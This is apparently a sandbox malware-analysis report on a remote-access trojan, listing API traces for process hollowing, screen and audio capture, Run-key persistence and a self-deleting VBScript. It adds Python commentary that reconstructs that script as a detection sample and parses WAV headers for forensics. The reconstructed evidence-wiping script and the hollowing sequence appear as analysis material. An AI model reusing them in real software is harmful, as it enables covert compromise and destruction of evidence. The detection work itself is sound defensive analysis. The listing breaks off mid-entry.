                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID:
                                      • API String ID: 2299586839-0

                                      APIs
                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                      • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                        • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                      • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                      • DeleteDC.GDI32(00000000), ref: 00418F2A
                                      • DeleteDC.GDI32(00000000), ref: 00418F2D
                                      • DeleteObject.GDI32(00000000), ref: 00418F30
                                      • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                      • DeleteDC.GDI32(00000000), ref: 00418F62
                                      • DeleteDC.GDI32(00000000), ref: 00418F65
                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                      • GetIconInfo.USER32(?,?), ref: 00418FBD
                                      • DeleteObject.GDI32(?), ref: 00418FEC
                                      • DeleteObject.GDI32(?), ref: 00418FF9
                                      • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                      • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                      • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                      • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                      • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                      • DeleteDC.GDI32(?), ref: 0041917C
                                      • DeleteDC.GDI32(00000000), ref: 0041917F
                                      • DeleteObject.GDI32(00000000), ref: 00419182
                                      • GlobalFree.KERNEL32(?), ref: 0041918D
                                      • DeleteObject.GDI32(00000000), ref: 00419241
                                      • GlobalFree.KERNEL32(?), ref: 00419248
                                      • DeleteDC.GDI32(?), ref: 00419258
                                      • DeleteDC.GDI32(00000000), ref: 00419263
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                      • String ID: DISPLAY
                                      • API String ID: 479521175-865373369

                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                      • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                      • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                      • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                      • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                      • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                      • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                      • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                      • ResumeThread.KERNEL32(?), ref: 00418435
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                      • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                      • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                      • GetLastError.KERNEL32 ref: 0041847A
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                      • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                      • API String ID: 4188446516-3035715614

                                      APIs
                                        • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                        • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                        • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                        • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                        • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                        • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                      • ExitProcess.KERNEL32 ref: 0040D7D0
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                      • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                      • API String ID: 1861856835-332907002
                                      • Opcode ID: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                                      • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                      • Opcode Fuzzy Hash: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                                      • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                        • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                      • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                        • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                        • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                        • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                        • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                      • ExitProcess.KERNEL32 ref: 0040D419
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                      • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                      • API String ID: 3797177996-2557013105
                                      • Opcode ID: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                                      • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                      • Opcode Fuzzy Hash: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                                      • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                      Uniqueness

                                      Uniqueness Score: -1.00%
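The two functions above share one mechanism: they write a VBScript into Temp (the `\update.vbs`, `On Error Resume Next`, `Set fso = CreateObject("Scripting.FileSystemObject")`, `while fso.FileExists(` ... `wend`, `fso.DeleteFile "`, `fso.DeleteFolder "` and `fso.DeleteFile(Wscript.ScriptFullName)` fragments under String ID), launch it with ShellExecuteW(open) and call ExitProcess immediately. The loop exists because the executable is still mapped when the script starts; the script keeps retrying DeleteFile until the process is gone, then removes itself. The second variant also clears the attributes with SetFileAttributesW(..., 0x80 = FILE_ATTRIBUTE_NORMAL) and deletes the HKCU Run entry first. The following scanner is an added example, not code from the report or from the malware: it assembles such a script from the listed fragments as a constructed sample (the exact line layout and the folder name `ExampleDir` are assumptions; the executable path is the one the report shows) and classifies a script by the combination of markers rather than by any single string.

```python
import re

# Constructed sample: the String ID fragments above assembled into the shape of
# the dropped script. Layout and the folder name are assumptions; only the
# fragments and the executable path come from the report.
SAMPLE_UNINSTALL_VBS = r'''On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
while fso.FileExists("C:\Users\user\AppData\Roaming\NvbYSEq.exe")
fso.DeleteFile "C:\Users\user\AppData\Roaming\NvbYSEq.exe"
wend
fso.DeleteFolder "C:\Users\user\AppData\Roaming\ExampleDir"
fso.DeleteFile(Wscript.ScriptFullName)
'''

# Constructed benign script that also uses FileSystemObject and DeleteFile, to
# show that the classifier needs the loop plus self-deletion, not the object alone.
SAMPLE_BENIGN_VBS = r'''Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile "C:\Temp\old.log"
MsgBox "done"
'''

MARKERS = {
    # swallow every runtime error so a still-locked file does not abort the loop
    "error_suppression": re.compile(r"^\s*On Error Resume Next\s*$", re.I | re.M),
    "fso": re.compile(r'CreateObject\("Scripting\.FileSystemObject"\)', re.I),
    # spin on FileExists and DeleteFile until the executable is gone; the RAT
    # calls ExitProcess right after ShellExecuteW, so the first attempts may fail
    "busy_wait_delete": re.compile(
        r'while\s+fso\.FileExists\("[^"]+"\).*?fso\.DeleteFile\b.*?^\s*wend\b',
        re.I | re.S | re.M),
    # remove the script itself as the last step
    "self_delete": re.compile(
        r"fso\.DeleteFile\s*\(\s*Wscript\.ScriptFullName\s*\)", re.I),
    # variant in the first function above: goes through cmd /c via WScript.Shell
    "shell_run_cmd": re.compile(
        r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd /c', re.I),
}

# quoted paths passed to DeleteFile / DeleteFolder (the self-delete form has no quote)
DELETE_TARGET = re.compile(r'fso\.Delete(?:File|Folder)\s+"([^"]+)"', re.I)


def scan(text):
    """Map each marker name to whether it occurs in the script text."""
    return {name: bool(rx.search(text)) for name, rx in MARKERS.items()}


def is_uninstall_stub(text):
    """True when the script has the delete-until-gone loop plus self-deletion,
    the combination that separates an uninstall stub from ordinary cleanup."""
    hits = scan(text)
    return hits["fso"] and hits["busy_wait_delete"] and hits["self_delete"]


def delete_targets(text):
    """Paths the script would remove: in IR this lists what evidence was wiped."""
    return sorted(set(DELETE_TARGET.findall(text)))
```

Run it over every .vbs recovered from %TEMP% of the affected host; `delete_targets` gives the paths to pull from backups or volume shadow copies, since the script is written to destroy the binary and then itself.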

                                      APIs
                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                      • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                      • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                      • GetCurrentProcessId.KERNEL32 ref: 00412541
                                      • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                      • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                      • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                        • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                      • Sleep.KERNEL32(000001F4), ref: 00412682
                                      • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                      • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                      • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                      • String ID: .exe$8SG$WDH$exepath$open$temp_
                                      • API String ID: 2649220323-436679193
                                      • Opcode ID: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                                      • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                      • Opcode Fuzzy Hash: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                                      • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                      • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                      • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                      • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                      • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                      • SetEvent.KERNEL32 ref: 0041B219
                                      • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                      • CloseHandle.KERNEL32 ref: 0041B23A
                                      • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                      • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                      • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                      • API String ID: 738084811-2094122233
                                      • Opcode ID: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                                      • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                      • Opcode Fuzzy Hash: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                                      • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                      • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                      • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                      • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                      • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                      • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                      • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                      • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                      • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                      • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                      • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Write$Create
                                      • String ID: RIFF$WAVE$data$fmt
                                      • API String ID: 1602526932-4212202414
                                      • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                      • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                      • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                      • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                      Uniqueness

                                      Uniqueness Score: -1.00%
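The WriteFile sequence above is the 44-byte PCM WAVE header emitted field by field: "RIFF", the RIFF size, "WAVE", "fmt ", a 4-byte chunk length (16), then the 2-byte format tag, 2-byte channel count, 4-byte sample rate, 4-byte byte rate, 2-byte block align and 2-byte bits per sample, followed by "data" and the data length. The header goes out before any samples, so a recording cut off when the process is killed advertises more data than the file holds. The code below is an added example, not from the report: it builds a header in that field order (the numeric inputs are constructed, not values recovered from the sample) and parses one back with the consistency checks an analyst would run on a recording recovered from the host.

```python
import struct

WAVE_FORMAT_PCM = 1
HEADER_LEN = 44  # RIFF(8) + WAVE(4) + fmt chunk(8 + 16) + data chunk header(8)


def build_wav_header(num_samples, sample_rate, channels, bits):
    """Emit the header in exactly the field order of the WriteFile calls above.
    Inputs are constructed for the example, not taken from the sample."""
    block_align = channels * bits // 8
    byte_rate = sample_rate * block_align
    data_len = num_samples * block_align
    return b"".join((
        b"RIFF", struct.pack("<I", 36 + data_len),
        b"WAVE",
        b"fmt ", struct.pack("<I", 16),
        struct.pack("<H", WAVE_FORMAT_PCM),
        struct.pack("<H", channels),
        struct.pack("<I", sample_rate),
        struct.pack("<I", byte_rate),
        struct.pack("<H", block_align),
        struct.pack("<H", bits),
        b"data", struct.pack("<I", data_len),
    ))


def parse_wav_header(blob):
    """Parse a file with the 44-byte PCM layout and return its fields plus the
    checks worth running before trusting it: do the derived sizes agree, and is
    the data chunk actually present in full?"""
    if len(blob) < HEADER_LEN:
        raise ValueError("shorter than a RIFF/WAVE header")
    riff, riff_size, wave, fmt, fmt_len = struct.unpack("<4sI4s4sI", blob[:20])
    if riff != b"RIFF" or wave != b"WAVE" or fmt != b"fmt ":
        raise ValueError("not a RIFF/WAVE file")
    tag, channels, rate, byte_rate, block_align, bits = struct.unpack("<HHIIHH", blob[20:36])
    data, data_len = struct.unpack("<4sI", blob[36:44])
    if fmt_len != 16 or data != b"data":
        raise ValueError("only a 16-byte PCM fmt chunk directly followed by data is handled")
    expected_align = channels * bits // 8
    return {
        "format_tag": tag,
        "channels": channels,
        "sample_rate": rate,
        "bits_per_sample": bits,
        "data_len": data_len,
        "consistent": (tag == WAVE_FORMAT_PCM
                       and block_align == expected_align
                       and byte_rate == rate * expected_align
                       and riff_size == 36 + data_len),
        "duration_s": data_len / byte_rate if byte_rate else None,
        # header is written before the samples, so a file cut off by process
        # termination claims more data than it contains
        "data_truncated": len(blob) - HEADER_LEN < data_len,
    }
```

`data_truncated` is the field to look at first on a seized disk: the byte rate and bits fields stay valid even when the sample region ends early, so the header alone does not tell you how much audio was really captured.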

                                      APIs
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\AppData\Roaming\NvbYSEq.exe,00000001,0040764D,C:\Users\user\AppData\Roaming\NvbYSEq.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                      • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                      • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                      • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                      • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                      • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                      • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: C:\Users\user\AppData\Roaming\NvbYSEq.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                      • API String ID: 1646373207-1450517273
                                      • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                      • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                      • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                      • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _wcslen.LIBCMT ref: 0040CE07
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                      • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\NvbYSEq.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                      • _wcslen.LIBCMT ref: 0040CEE6
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                      • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\NvbYSEq.exe,00000000,00000000), ref: 0040CF84
                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                      • _wcslen.LIBCMT ref: 0040CFC6
                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                      • ExitProcess.KERNEL32 ref: 0040D062
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                      • String ID: 6$C:\Users\user\AppData\Roaming\NvbYSEq.exe$del$open
                                      • API String ID: 1579085052-552931864
                                      • Opcode ID: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                                      • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                      • Opcode Fuzzy Hash: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                                      • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrlenW.KERNEL32(?), ref: 0041C036
                                      • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                      • lstrlenW.KERNEL32(?), ref: 0041C067
                                      • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                      • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                      • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                      • _wcslen.LIBCMT ref: 0041C13B
                                      • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                      • GetLastError.KERNEL32 ref: 0041C173
                                      • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                      • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                      • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                      • GetLastError.KERNEL32 ref: 0041C1D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                      • String ID: ?
                                      • API String ID: 3941738427-1684325040
                                      • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                      • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                      • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                      • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                      • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                      • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                      • LoadLibraryA.KERNEL32(?), ref: 00414E76
